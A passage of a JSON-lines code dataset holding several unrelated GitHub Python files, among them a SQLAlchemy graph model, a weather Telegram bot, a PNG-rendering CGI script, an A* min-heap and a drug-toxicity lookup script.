default='data')\nadd_arg('--threshold', type=float,\n help='source fraction threshold for binary classification', default=0.0)\nadd_arg('--sigmaLnE', type=float, help='deltaE/E energy resolution', default=0.2)\nadd_arg('--seed', type=int, help='sample generator seed', default=test_seed)\nadd_arg('--exclude_energy', action='store_true', help='legacy mode without energy as extra observable')\nadd_arg('--exposure', type=str, help='exposure: uniform/TA', default='uniform')\nadd_arg('--n_iterations', type=int, help='increase number of iterations for more precise result', default=1)\n\nargs = cline_parser.parse_args()\nif len(args.fractions) > 0:\n assert len(args.fractions) == len(args.sources) and len(args.sources) > 1\n\ntry:\n import train_healpix\n model = train_healpix.create_model(12*args.Nside*args.Nside, pretrained=args.model)\n Generator = train_healpix.SampleGenerator\nexcept:\n import train_gcnn\n model = train_gcnn.create_model(args.Neecr, pretrained=args.model)\n Generator = train_gcnn.SampleGenerator\n\ntest_batches = (args.seed == test_seed)\nif not test_batches:\n np.random.seed(args.seed)\n\ngen = Generator(\n args, deterministic=test_batches, sources=args.sources, suffix=args.suffix, seed=args.seed, mixture=args.fractions)\n\nfrom beta import calc_detectable_frac\nfrac, alpha = calc_detectable_frac(gen, model, args, n_iterations=args.n_iterations)\n\nout_file = args.model + \"_cmp.txt\"\nwith open(out_file, \"a\") as d:\n print(\"Model to compare with:\", file=d)\n print(*args.sources, file=d)\n if len(args.fractions) > 0:\n print('fractions:', *args.fractions, file=d)\n print(\"Neecr={:3d}\".format(args.Neecr), file=d)\n print(\"Nmixed_samples={:5d}\".format(args.n_samples), file=d)\n d.write(\"frac={:7.2f}\\n\".format(frac*100))\n d.write(\"alpha={:6.4f}\\n\".format(alpha))\n d.write(\"------------------------------\\n\")\n","repo_name":"okolo/ml_cr_aniso","sub_path":"src/calc_min_fractions.py","file_name":"calc_min_fractions.py","file_ext":"py","file_size_in_byte":4139,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"31"} +{"seq_id":"5536787235","text":"from sqlalchemy import create_engine, Column, String, Text, ForeignKey\nfrom sqlalchemy.ext.declarative import declarative_base\nfrom sqlalchemy.orm import scoped_session, sessionmaker, backref, relationship, object_session, Session\nfrom sqlalchemy.ext.hybrid import hybrid_property, hybrid_method\nfrom multiprocessing import Lock\n\nimport uuid\nimport json\nfrom .seralizer import SerializerInterface\n\nmutex = Lock()\ncurrent_engines = {}\n\n# def init_db():\n# Model.metadata.create_all(bind=engine)\n\n# https://docs.sqlalchemy.org/en/14/orm/join_conditions.html\nDBModel = declarative_base(name='DBModel')\n\n\nclass DBGraph:\n def __init__(self, db_name: str, root=None):\n self.name = db_name\n\n global current_engines, mutex\n engine = None\n with mutex:\n if self.name in current_engines.keys():\n engine = current_engines[self.name]['engine']\n current_engines[self.name]['sessions'] += 1\n else:\n\n engine = create_engine('sqlite:///' + self.name,\n convert_unicode=True)\n DBModel.metadata.create_all(bind=engine)\n\n with engine.connect() as con:\n con.execute(\"PRAGMA foreign_keys = TRUE;\")\n current_engines.update({self.name: {\"engine\": engine, \"sessions\": 1}})\n\n self.session = scoped_session(sessionmaker(autocommit=False,\n autoflush=False,\n bind=engine))\n DBModel.query = self.session.query_property()\n\n def __del__(self):\n # self.close()\n global current_engines, mutex\n with mutex:\n if self.name in current_engines.keys():\n current_engines[self.name]['sessions'] -= 1\n if current_engines[self.name]['sessions'] == 0:\n engine = current_engines[self.name]['engine']\n # if engine:\n # engine.close()\n del current_engines[self.name]\n\n\nclass DBRelation(DBModel, SerializerInterface):\n __tablename__ = 'relationship'\n source_id = Column('source', String(36), ForeignKey(\"nodes.id\"), primary_key=True)\n target_id = Column('target', String(36), ForeignKey(\"nodes.id\"), primary_key=True)\n relation = Column('relation', Text)\n _properties = Column('properties', Text)\n\n source = relationship(\"DBNode\", primaryjoin=\"DBRelation.source_id == DBNode.id\",\n backref=backref('relation_targets', lazy='dynamic'))\n target = relationship(\"DBNode\", primaryjoin=\"DBRelation.target_id == DBNode.id\",\n backref=backref('relation_sources', lazy='dynamic'))\n\n def __init__(self, source, relation: str, target, properties={}):\n self.relation = relation\n self._properties = json.dumps(properties)\n source.relation_targets.append(self)\n target.relation_sources.append(self)\n\n @hybrid_property\n def properties(self):\n return self._properties\n\n @properties.setter\n def properties(self, properties: {}):\n self._properties = json.dumps(properties)\n\n @properties.getter\n def properties(self):\n return json.loads(self._properties)\n\n def to_dict(self):\n return dict(source=self.source_id, target=self.target_id, relation=self.relation, properties=self.properties)\n\n\nclass DBNode(DBModel, SerializerInterface):\n __tablename__ = 'nodes'\n id = Column('id', String(36), primary_key=True, index=True)\n name = Column('name', String(64))\n _body = Column('body', Text)\n _types = Column('types', Text)\n\n def __init__(self, name, types=[], body={}, id=str(uuid.uuid4())):\n self.id = id\n self.name = name\n self._body = json.dumps(body)\n self._types = ','.join(types) # .lower()\n\n @hybrid_property\n def body(self):\n return self._body\n\n @body.setter\n def body(self, body: {}):\n self._body = json.dumps(body)\n\n @body.getter\n def body(self):\n return json.loads(self._body)\n\n @hybrid_property\n def types(self):\n return self._types\n\n @types.setter\n def types(self, types):\n self._types = ','.join(types)\n\n @hybrid_method\n def types(self):\n return self._types.split(\",\")\n\n @hybrid_method # property\n def targets(self, relations=None, iterate=False):\n result = []\n uniques = []\n\n def search(node: DBNode):\n query = object_session(node).query(DBNode) \\\n .filter(DBRelation.target_id == DBNode.id)\n res = []\n if relations:\n res = query.filter(DBRelation.source_id == node.id,\n DBRelation.relation.in_(tuple(relations))).all()\n else:\n res = query.filter(DBRelation.source_id == node.id).all()\n\n if res:\n for elem in res:\n print(elem.to_dict())\n if not elem.id in uniques:\n result.append(elem)\n uniques.append(elem.id)\n if iterate:\n search(elem)\n\n search(self)\n return result\n\n def to_dict(self):\n return dict(id=self.id, name=self.name, body=self.body, types=self.types())\n","repo_name":"DigiFors/dfgraph","sub_path":"src/dfgraph/database.py","file_name":"database.py","file_ext":"py","file_size_in_byte":5371,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"30322226827","text":"import os\nimport sys\n\n\ndef make_cp_file(args):\n source = args[0]\n destination = args[1]\n with open(source) as src:\n lines = [l.strip() for l in src if l.strip()]\n with open(destination, 'w') as dst:\n dst.write(os.pathsep.join(lines))\n\n\nif __name__ == '__main__':\n make_cp_file(sys.argv[1:])\n","repo_name":"nslsrv/takewithya","sub_path":"build/scripts/make_java_classpath_file.py","file_name":"make_java_classpath_file.py","file_ext":"py","file_size_in_byte":320,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"5464638836","text":"import requests\nimport pprint\nimport datetime\n\nfrom telega_bot import bot_conf\n\nAPI_KEY = bot_conf.OPENWEATHERMAP_API_KEY\nURL = \"http://api.openweathermap.org/data/2.5/weather?q={}&units=metric&appid={}\"\nURL_BY_CITY_ID = \"http://api.openweathermap.org/data/2.5/weather?id={}&units=metric&appid={}\"\nURL_TOMORROW_BY_CITY_ID = \"http://api.openweathermap.org/data/2.5/forecast?id={}&units=metric&appid={}\"\n\n# Openweathermap Weather codes and corressponding emojis\nthunderstorm = u'\\U0001F4A8' # Code: 200's, 900, 901, 902, 905\ndrizzle = u'\\U0001F4A7' # Code: 300's\nrain = u'\\U00002614' # Code: 500's\nsnowflake = u'\\U00002744' # Code: 600's snowflake\nsnowman = u'\\U000026C4' # Code: 600's snowman, 903, 906\natmosphere = u'\\U0001F301' # Code: 700's foogy\nclear_sky = u'\\U00002600' # Code: 800 clear sky\nfew_clouds = u'\\U000026C5' # Code: 801 sun behind clouds\nclouds = u'\\U00002601' # Code: 802-803-804 clouds general\nhot = u'\\U0001F525' # Code: 904\ndefault_emoji = u'\\U0001F300' # default emojis\n\n\ndef get_emoji(weather_id):\n if weather_id:\n if str(weather_id)[0] == '2' or weather_id == 900 or weather_id == 901 or weather_id == 902 or weather_id == 905:\n return thunderstorm\n elif str(weather_id)[0] == '3':\n return drizzle\n elif str(weather_id)[0] == '5':\n return rain\n elif str(weather_id)[0] == '6' or weather_id == 903 or weather_id == 906:\n return snowflake + ' ' + snowman\n elif str(weather_id)[0] == '7':\n return atmosphere\n elif weather_id == 800:\n return clear_sky\n elif weather_id == 801:\n return few_clouds\n elif weather_id == 802 or weather_id == 803 or weather_id == 804:\n return clouds\n elif weather_id == 904:\n return hot\n else:\n return default_emoji # Default emoji\n\n else:\n return default_emoji # Default emoji\n\n\ndef get_temp_by_city_name(city):\n resp = requests.get(URL.format(city, API_KEY))\n if resp.status_code == 200:\n temp = resp.json()['main']['temp']\n else:\n temp = 'NaN'\n return temp\n\n\ndef get_temp_by_city_id(city_id):\n resp = requests.get(URL_BY_CITY_ID.format(city_id, API_KEY))\n if resp.status_code == 200:\n temp = resp.json()['main']['temp']\n feels_like = resp.json()['main']['feels_like']\n wind = resp.json()['wind']['speed']\n main = resp.json()['weather'][0]['description'][0].upper() + resp.json()['weather'][0]['description'][1:] \\\n + ' ' + get_emoji(resp.json()['weather'][0]['id'])\n\n else:\n temp = 'NaN'\n feels_like = 'NaN'\n wind = 'NaN'\n main = 'NaN'\n return temp, feels_like, wind, main\n\n\ndef get_temp_tomorrow_by_city_id(city_id):\n resp = requests.get(URL_TOMORROW_BY_CITY_ID.format(city_id, API_KEY))\n if resp.status_code == 200:\n text = \"{}\\n\".format(resp.json()['city']['name'])\n\n find_six_morning = 0\n for find_six_morning in range(len(resp.json()['list'])):\n if '06:00:00' in resp.json()['list'][find_six_morning]['dt_txt']:\n break\n\n for i in range(find_six_morning, find_six_morning+5, 2):\n dt = datetime.datetime.utcfromtimestamp(resp.json()['list'][i]['dt']).strftime('%m.%d %H:%M')\n temp = resp.json()['list'][i]['main']['temp']\n feels_like = resp.json()['list'][i]['main']['feels_like']\n wind = resp.json()['list'][i]['wind']['speed']\n main = resp.json()['list'][i]['weather'][0]['description'][0].upper() + \\\n resp.json()['list'][i]['weather'][0]['description'][1:] \\\n + ' ' + get_emoji(resp.json()['list'][i]['weather'][0]['id'])\n\n text += \"{}\\n\\U0001F321 {}\\nFeels like: {}\\nWind: {} m/s\\n{}\\n\\n\".\\\n format(dt, temp, feels_like, wind, main)\n else:\n text = 'NaN'\n return text\n\n\nif __name__ == '__main__':\n city = \"New York City\"\n r = get_temp_by_city_name(city)\n print(r)\n\n # resp = requests.get(URL.format(city, API_KEY)).json()\n # print(resp)\n\n r = requests.get(URL_BY_CITY_ID.format(591260, API_KEY))\n pprint.pprint(r.json())\n","repo_name":"masb3/telega_bot","sub_path":"telega_bot/openweathermap.py","file_name":"openweathermap.py","file_ext":"py","file_size_in_byte":4203,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"24348223717","text":"#!/usr/bin/python3\n\nimport pngcanvas\nimport cgi\nimport jsonsinglequote\nimport math\nimport cgitb; cgitb.enable()\n\ncache = 'postcache'\n\ndef if_else(condition, trueVal, falseVal):\n if condition:\n return trueVal\n else:\n return falseVal\n\ndef safe_ternary(x, conditionfn, truefn, falsefn):\n if (conditionfn(x)):\n return truefn(x)\n else:\n return falsefn(x)\n\nfnInfo = {\n 'num': {'children': 0, 'aux': 'val'},\n 'x': {'children': 0},\n 'y': {'children': 0},\n 'atan': {'children': 1, 'needsMap' : True},\n 'abs': {'children': 1},\n 'cos': {'children': 1},\n 'exp': {'children': 1, 'needsMap' : True},\n 'log': {'children': 1, 'needsMap' : True},\n 'neg': {'children': 1},\n 'rd': {'children': 1},\n 'ru': {'children': 1},\n 'sin': {'children': 1},\n 'add': {'children': 2, 'needsMap' : True},\n 'div': {'children': 2, 'needsMap' : True},\n 'mul': {'children': 2, 'needsMap' : True},\n 'sub': {'children': 2, 'needsMap' : True},\n 'ccrgb': {'children': 3},\n 'cchsl': {'children': 3}}\n\n\n\n# Mapping strategies ensure the result is coerced to [-1,1]\n# 'c' means clip to [-1,1]\n# 'w' means wrap to [-1,1]\ndef makeMappingStrategy(jsonObj):\n return {\n 'c': (lambda v: (if_else(v > 1, 1, if_else(v < -1, -1, v)))),\n 'w': (lambda v: (if_else(v == 1, 1, ((v+1)%2.0)-1)))\n }[jsonObj['m']]\n\ndef makeMappingStrategyList(jsonObj):\n return {\n 'c': (lambda l: [if_else(v > 1, 1, if_else(v < -1, -1, v)) for v in l]),\n 'w': (lambda l: [if_else(v == 1, 1, ((v+1)%2.0)-1) for v in l])\n }[jsonObj['m']]\n\ndef finalHslToRgb(tc, q, p):\n if (tc < (1.0/6.0)):\n return p + ((q - p) * 6.0 * tc)\n elif (tc < (1.0/2.0)):\n return q\n elif (tc < (2.0/3.0)):\n return p + ((q - p) * ((2.0/3.0) - tc) * 6.0)\n else:\n return p\n\ndef hslToRgb(c, x, y):\n # get grayscale values for c[0], 1, 2?\n hOrig = 0.3 * c[0][0] + 0.59 * c[0][1] + 0.11 * c[0][2]\n sOrig = 0.3 * c[1][0] + 0.59 * c[1][1] + 0.11 * c[1][2]\n lOrig = 0.3 * c[2][0] + 0.59 * c[2][1] + 0.11 * c[2][2]\n # Scale h, s and l to be 0 to 1\n h = (hOrig + 1.0) / 2.0\n s = (sOrig + 1.0) / 2.0\n l = (lOrig + 1.0) / 2.0\n if (s == 0.0):\n return [(l * 2.0 - 1.0) for i in range(0, 3)]\n if (l < 0.5):\n q = l * (1.0 + s)\n else:\n q = l + s - (l * s)\n p = 2.0 * l - q\n tr = h + (1.0/3.0)\n tg = h\n tb = h - (1.0/3.0)\n if (tr < 0.0):\n tr += 1.0\n elif (tr > 1.0):\n tr -= 1.0\n if (tg < 0.0):\n tg += 1.0\n elif (tg > 1.0):\n tg -= 1.0\n if (tb < 0.0):\n tb += 1.0\n elif (tb > 1.0):\n tb -= 1.0\n cr = finalHslToRgb(tr, q, p)\n cg = finalHslToRgb(tg, q, p)\n cb = finalHslToRgb(tb, q, p)\n return [(cr * 2.0 - 1.0), (cg * 2.0 - 1.0), (cb * 2.0 - 1.0)]\n \ndef simpleEval(jsonObj):\n return {\n 'num': lambda c, x, y: [jsonObj['val'] for i in range(0,3)],\n 'x' : lambda c, x, y: [x for i in range(0,3)],\n 'y': lambda c, x, y: [y for i in range(0,3)],\n 'atan': lambda c, x, y: [math.atan(c[0][i]) for i in range(0,3)],\n 'abs': lambda c, x, y: [abs(c[0][i]) for i in range(0,3)],\n 'cos': lambda c, x, y: [math.cos(c[0][i]) for i in range(0, 3)],\n 'exp': lambda c, x, y: [math.exp(c[0][i]) for i in range(0, 3)],\n 'log': lambda c, x, y: [safe_ternary(c[0][1], lambda x: x <= 0.0, lambda x: 0, lambda x: math.log(x)) for i in range(0, 3)],\n 'neg': lambda c, x, y: [-1.0 * c[0][i] for i in range(0, 3)],\n 'rd': lambda c, x, y: [math.floor(c[0][i]) for i in range(0, 3)],\n 'ru': lambda c, x, y: [math.ceil(c[0][i]) for i in range(0, 3)],\n 'sin': lambda c, x, y: [math.sin(c[0][i]) for i in range(0, 3)],\n 'add': lambda c, x, y: [c[0][i] + c[1][i] for i in range(0, 3)],\n 'div': lambda c, x, y: [safe_ternary((c[0][1], c[1][i]), lambda x : x[1] == 0.0, lambda x: 0, lambda x: x[0]/x[1]) for i in range(0, 3)],\n 'mul': lambda c, x, y: [c[0][i] * c[1][i] for i in range(0, 3)],\n 'sub': lambda c, x, y: [c[0][i] - c[1][i] for i in range(0, 3)],\n 'ccrgb': lambda c, x, y: [c[0][0], c[1][1], c[2][2]],\n 'cchsl': hslToRgb\n }[jsonObj['t']]\n\ndef makeTopEvaluator(jsonObj):\n eval = makeEvaluator(jsonObj)\n oldEval = eval['eval']\n eval['eval'] = lambda xs, ys: coerceResults(oldEval(xs, ys), xs, ys, eval['dep'], {'x': True, 'y': True})\n return eval\n\ndef makeEvaluator(jsonObj):\n toReturn = {}\n typeInfo = fnInfo[jsonObj['t']]\n if (typeInfo['children'] > 0):\n toReturn['c'] = [makeEvaluator(jsonObj['ch'][i]) for i in range(0, len(jsonObj['ch']))]\n # Figure out if we depend on x, y, or neither\n toReturn['dep'] = {}\n toReturn['dep']['x'] = (jsonObj['t'] == 'x')\n toReturn['dep']['y'] = (jsonObj['t'] == 'y')\n if ('c' in toReturn):\n for child in toReturn['c']:\n for xy in ['x', 'y']:\n if (child['dep'][xy]):\n toReturn['dep'][xy] = True\n simEval = simpleEval(jsonObj)\n if ('needsMap' in typeInfo and typeInfo['needsMap']):\n mapStrat = makeMappingStrategyList(jsonObj)\n else:\n mapStrat = lambda l: l\n toReturn['eval'] = lambda xs, ys: xyAdapter(toReturn, mapStrat, simEval, xs, ys)\n return toReturn\n\n# Results are listed in row order - (x0, y0), (x1, y0), ..., (xn, y0), (x0, y1)\n# etc.\ndef coerceResults(results, xs, ys, sourceDeps, targetDeps):\n coerceY = sourceDeps['y'] == False and targetDeps['y'] == True\n coerceX = sourceDeps['x'] == False and targetDeps['x'] == True\n if (coerceY):\n results = [r for y in ys for r in results]\n if (coerceX):\n results = [r for r in results for x in xs]\n return results\n\ndef xyAdapter(fnObj, mapStrat, simEval, xs, ys):\n childResults = []\n if ('c' in fnObj):\n for childObj in fnObj['c']:\n childResults.append(coerceResults(childObj['eval'](xs, ys), xs, ys, childObj['dep'], fnObj['dep']))\n if (not fnObj['dep']['x']):\n xs = [0.0]\n if (not fnObj['dep']['y']):\n ys = [0.0]\n childArgs = list(zip(*childResults))\n xys = [(x, y) for y in ys for x in xs]\n if ('c' in fnObj):\n return [mapStrat(simEval(c, x, y)) for ((x, y), c) in zip(xys, childArgs)]\n else:\n return [mapStrat(simEval([], x, y)) for (x, y) in xys]\n#def makeEvaluatorOld(jsonObj):\n# return {\n# 'num': (lambda jo: {'eval': (lambda this, x, y: [jo['val'] for i in range(0,3)])}),\n# 'x': (lambda jo: {'eval': (lambda this, x, y: [x for i in range(0,3)])}),\n# 'y': (lambda jo: {'eval': (lambda this, x, y: [y for i in range(0,3)])}),\n# 'atan': (lambda jo: {'c': [makeEvaluatorOld(jsonObj['ch'][0])], 'eval': (lambda this, x, y: [makeMappingStrategy(jo)(math.atan(v)) for v in this['c'][0]['eval'](this['c'][0], x,y)])}),\n# 'add': (lambda jo: {'c': [makeEvaluatorOld(jsonObj['ch'][0]), makeEvaluatorOld(jsonObj['ch'][1])], 'eval': (lambda this, x, y: [makeMappingStrategy(jo)(v1 + v2) for (v1,v2) in zip(this['c'][0]['eval'](this['c'][0],x,y), this['c'][1]['eval'](this['c'][1],x,y))])}),\n# }[jsonObj['t']](jsonObj)\n \nform = cgi.FieldStorage()\nfunc = jsonsinglequote.read(form.getfirst('f'))\nwidth = int(form.getfirst('w'))\nheight = int(form.getfirst('h'))\n#if (form.getfirst('saveFunc') == 't'):\n \n# Don't do anything unreasonably large\nif (width <= 0 or height <= 0 or width > 10000 or height > 10000):\n pass\nelse:\n c = pngcanvas.PNGCanvas(width, height)\n c.apply(makeTopEvaluator(func))\n\n print(\"Content-type: image/png\\n\")\n print(c.dump())\n","repo_name":"gregstoll/ppga","sub_path":"makepng.py","file_name":"makepng.py","file_ext":"py","file_size_in_byte":7599,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"16033231882","text":"def parent_index(node_index):\r\n return (node_index - 1) >> 1\r\n\r\n\r\ndef left_child_index(node_index):\r\n return (node_index << 1) + 1\r\n\r\n\r\ndef right_child_index(node_index):\r\n return (node_index + 1) << 1\r\n\r\n\r\n# Min-Heap for use in A* algorithm\r\nclass AStarMinHeap:\r\n len = 0\r\n nodes = []\r\n\r\n def __init__(self, graph):\r\n self.nodes = list(graph.nodes)\r\n self.len = len(graph.nodes)\r\n for i in range(self.len):\r\n self.nodes[i].heap_pos = i\r\n self.init_heap()\r\n\r\n def swap(self, a, b):\r\n self.nodes[a].heap_pos = b\r\n self.nodes[b].heap_pos = a\r\n self.nodes[a], self.nodes[b] = self.nodes[b], self.nodes[a]\r\n\r\n # Checks if a node is too far up in the heap, and swaps it downwards to its correct position\r\n def fix_heap(self, index):\r\n child_to_swap = left_child_index(index)\r\n if child_to_swap < self.len:\r\n right_child = child_to_swap + 1\r\n\r\n if right_child < self.len and self.nodes[right_child].prio < self.nodes[child_to_swap].prio:\r\n child_to_swap = right_child\r\n\r\n if self.nodes[child_to_swap].prio < self.nodes[index].prio:\r\n self.swap(index, child_to_swap)\r\n self.fix_heap(child_to_swap)\r\n\r\n def init_heap(self):\r\n index = self.len >> 1\r\n while index > 0:\r\n index -= 1\r\n self.fix_heap(index)\r\n\r\n def pop_min(self):\r\n self.len -= 1\r\n self.swap(0, self.len)\r\n self.fix_heap(0)\r\n self.nodes[self.len].heap_pos = -1 # Not in the heap anymore\r\n return self.nodes[self.len]\r\n\r\n # Checks if a node is too far down in the heap, and swaps it upwards to its correct position\r\n def prio_decreased(self, index):\r\n parent = parent_index(index)\r\n while index > 0 and self.nodes[index].prio < self.nodes[parent].prio:\r\n self.swap(index, parent)\r\n index = parent\r\n parent = parent_index(index)\r\n\r\n # Same as fix_heap(index)\r\n def prio_increased(self, index):\r\n self.fix_heap(index)\r\n\r\n def set_prio(self, index, prio):\r\n delta = prio - self.nodes[index].prio\r\n self.nodes[index].prio = prio\r\n if delta > 0:\r\n self.prio_increased(index)\r\n elif delta < 0:\r\n self.prio_decreased(index)\r\n\r\n def insert(self, node):\r\n self.len += 1\r\n if len(self.nodes) <= self.len:\r\n self.nodes.append(node)\r\n self.len = len(self.nodes)\r\n else:\r\n self.nodes[self.len - 1] = node\r\n\r\n self.nodes[self.len - 1].heap_pos = self.len - 1\r\n self.prio_decreased(self.len - 1)\r\n","repo_name":"mchyll/algdat","sub_path":"src/Oving13/AStarMinHeap.py","file_name":"AStarMinHeap.py","file_ext":"py","file_size_in_byte":2682,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"72557108888","text":"st = input()\ngl = 'аеёиоуыэюяАЕЁИОУЫЭЮЯ'\nsogl = 'бвгджзйклмнпрстфхцчшщБВГДЖЗЙКЛМНПРСТФХЦЧШЩ'\ncount_gl = 0\ncount_sogl = 0\n\nfor i in st:\n if i in gl:\n count_gl += 1\n if i in sogl:\n count_sogl += 1\nprint(f'Количество гласных букв равно {count_gl}')\nprint(f'Количество согласных букв равно {count_sogl}')\n","repo_name":"IhorStoliarov/es","sub_path":"stepik/_9_string/_9_string_indexation/_9_7_alphabet.py","file_name":"_9_7_alphabet.py","file_ext":"py","file_size_in_byte":437,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"72074169049","text":"import time\r\nfrom ElsevierAPI.ResnetAPI.PathwayStudioGOQL import OQL\r\nfrom ElsevierAPI.ResnetAPI.NetworkxObjects import Reference\r\nfrom ElsevierAPI import load_api_config\r\nfrom ElsevierAPI.ResnetAPI.ResnetAPISession import APISession\r\nfrom ElsevierAPI.PharmapendiumAPI.PharmapendiumAPI import SafetyPP\r\nimport pandas as pd\r\n\r\nAPIconfig = load_api_config()\r\nps_api = APISession(APIconfig)\r\nfileIn = 'Drugs for Regulators in 4 patients.txt'\r\nInDir = 'D:\\\\Python\\\\PBTA\\\\PNOC003\\\\4 patients analysis\\\\'\r\nwith open(InDir+fileIn) as f:\r\n drugs = [line.rstrip('\\n') for line in f]\r\n\r\nprint('Finding drugs in %s in Resnet' %(fileIn))\r\nOQLquery = OQL.get_entities_by_props(drugs, ['Name', 'Alias'], only_object_types=['Small Molecule'])\r\nps_api.add_ent_props(['Name','PharmaPendium ID'])\r\nresnet_drugs = ps_api.process_oql(OQLquery,'Find all drugs')\r\nprint ('Found %d drugs in Resnet' % len(resnet_drugs))\r\n\r\n#removing duplicates wiht no PharmaPendium ID\r\nresnet2pharmapendium_map = dict()\r\nfor i, drug in resnet_drugs.nodes(data=True):\r\n try:\r\n resnet2pharmapendium_map[str(drug['Name'][0]).lower()] = drug['PharmaPendium ID'][0]\r\n except KeyError: continue\r\n\r\nall_drugs = list(resnet_drugs.nodes(data=True))\r\nfor i, drug in all_drugs:\r\n if str(drug['Name'][0]).lower() in resnet2pharmapendium_map.keys() and 'PharmaPendium ID' not in drug.keys():\r\n resnet_drugs.remove_node(i)\r\nprint ('%d drugs left after deduplication' % resnet_drugs.number_of_nodes())\r\n\r\nprint('Beginning Pharmapendium response download with urllib...')\r\nsafety_in_pp = SafetyPP('lookupFuzzy',APIconfig)\r\n\r\nfileOut2 = InDir + fileIn[:len(fileIn)-4]+'_unmapped.txt'\r\ncol_names = ['Smiles','Resnet name','Tox Category','#Ref','References']\r\nToxPandas = pd.DataFrame(columns=col_names)\r\nToxPandas.index.name = \"PP name\\ttoxicity\"\r\n\r\nstart_time = time.time()\r\nprint ('Will find toxicities for %d drugs found in Resnet' % resnet_drugs.number_of_nodes())\r\nfor i, drug in resnet_drugs.nodes(data=True):\r\n drugPSname = drug['Name'][0]\r\n try: drugPPname = drug['PharmaPendium ID'][0]\r\n except KeyError: drugPPname = drugPSname\r\n safety_in_pp._add_param({'drugs':drugPPname})\r\n all_docs = safety_in_pp.get_results()\r\n \r\n DrugToxicities = dict()\r\n for doc in all_docs:\r\n toxicity=doc['effect']\r\n try: \r\n DrugToxicities[toxicity].append(doc)\r\n except KeyError:\r\n DrugToxicities[toxicity] = [doc]\r\n\r\n toxCount = 0\r\n for toxicity, references in DrugToxicities.items():\r\n toxCount += 1\r\n print('\\'%s\\' - %d from %d toxicities for \\\"%s\\\" was reported in %d documents' % (toxicity,toxCount,len(DrugToxicities),drugPSname,len(references)))\r\n pandaIndex = drugPPname+'\\t'+toxicity\r\n \r\n try: smiles = references[0]['smiles']\r\n except KeyError: smiles=''\r\n\r\n toxTax = safety_in_pp.GetTopEffectCategory(toxicity)\r\n\r\n ToxPandas.at[pandaIndex,col_names[0]] = smiles\r\n ToxPandas.at[pandaIndex,col_names[1]] = drugPSname\r\n ToxPandas.at[pandaIndex,col_names[2]] = toxTax\r\n\r\n refIndex = dict()\r\n for ref in references:\r\n document = ref['document']\r\n\r\n try:docName = document['name']\r\n except KeyError:\r\n try: docName = document['article']\r\n except KeyError: docName = document['journal']\r\n \r\n docSource = document['sourceShort']\r\n refIdentifier = docSource+':'+docName\r\n try: PPRef = refIndex[refIdentifier]\r\n except KeyError:\r\n PPRef = Reference('Title',refIdentifier)\r\n refIndex[refIdentifier] = PPRef\r\n\r\n try:PubYear = str(document['year'])\r\n except KeyError: PubYear = 'historic'\r\n PPRef.set_property('PubYear', PubYear)\r\n \r\n try:dose = ref['dose']\r\n except KeyError: dose = ''\r\n\r\n try: doseType=ref['doseType']\r\n except KeyError: doseType=''\r\n \r\n try:route=ref['route']\r\n except KeyError: route=''\r\n \r\n organism=ref['specie']\r\n PPRef.update_with_value(route, doseType + ' in ' + organism + ' ' + dose)\r\n\r\n addToPandas = set()\r\n for ref in refIndex.values():\r\n addToPandas.update([ref.to_str('Title', sep='-')])\r\n\r\n ToxPandas.at[pandaIndex,col_names[3]] = len(addToPandas)\r\n reflist = '|'.join(list(addToPandas))\r\n ToxPandas.at[pandaIndex,col_names[4]] = reflist \r\n \r\nToxPandas.to_csv(InDir+fileIn[:len(fileIn)-4]+'_PPtaxonomy.txt',sep='\\t')\r\nprint('Finished finding toxicities in Pharmapendium in %s' % ps_api.execution_time(start_time))\r\n","repo_name":"AntonYuryev/ElsevierAPI","sub_path":"DrugToxFromPharmapendium.py","file_name":"DrugToxFromPharmapendium.py","file_ext":"py","file_size_in_byte":4717,"program_lang":"python","lang":"en","doc_type":"code","stars":10,"dataset":"github-code","pt":"31"} +{"seq_id":"16305968377","text":"# A file i use python to simulate the stuff I do in C to see if it works\n\n# with open(\"dictionaries/large\",\"r\") as file:\n# data = file.read().split(\"\\n\")\n# count = 0\n# for word in data:\n# if len(word) < 1:\n# continue\n# if len(word) > 25:\n# print(word)\n\ncount = 0\nn = 4 # number of characters in word: strlen(word)\nchar_count = 0 # on which character: i\ne = f = 0\nlet = \"abcdefghijklmnopqrstuvwxyz?\"\ndict = {}\nindex = 0\nhash_loc = [0, 26, 728, 19682, 531440, 14348906]\nfor a in range(26):\n for b in range(27):\n for c in range(27):\n for d in range(27):\n# for e in range(27):\n# for f in range(27):\n# + e * pow(27, n - 5) + e * pow(27, n - 6)\n dict[f\"{let[a]}{let[b]}{let[c]}{let[d]}\"] = count\n count += 1\n # if (a * pow(27, n - 1) + b * pow(27, n - 2) + c * pow(27, n - 3) + d * pow(27, n - 4)) != (count - 1):\n # print(False)\n # print(f\"{c[i]}: {i} {c[j]}: {j} {c[k]}: {k}--> {count - 1} i * 27^2 + j * 27^1 + k = {i * 27 * 27 + j * 27 + k}\")\n\nprint(f\"Number of combinations: {count}\")\n# print(ord(\"z\".upper()) - ord(\"A\"))\n# print(\"?\".isalpha())\ntest = \"aaa?cefas\"\nletter_index = 0\nfor x in range(4):\n letter = test[x]\n if letter.isalpha():\n temp = ord(letter.upper()) - ord(\"A\")\n else:\n temp = 26\n # print(temp, n - letter_index - 1, letter_index, n)\n index += (temp * pow(27, n - letter_index - 1))\n letter_index += 1\nprint(dict[test[:4]], index)\n\n'''\nsome C stuff for if the load worked using tries not hash tables\n // JUST FOUND OUT THESE ARE FOR TRIES NOT HASH TABLES\n // Set Temp node to be node with first letter\n node *temp_letter_table = &table[hash(word[0])];\n // For each letter starting from 2nd letter (if word is 2+ length), go into correct node in table\n for (int i = 1; i < strlen(word) && i < 6; i++)\n {\n temp_letter_table = *temp_letter_table[hash(word[i])];\n }\n // Set the correct node of that word to be true\n if (temp_letter_table->word == NULL)\n temp_letter_table->word = word;\n temp_letter_table->next = next;\n'''\n\n# log: just found out the table[N] hash table only all possibilities of words/combinations with only 6+ characters but not any 5- charactered combinations\n'''\nConsidering 6 characters require 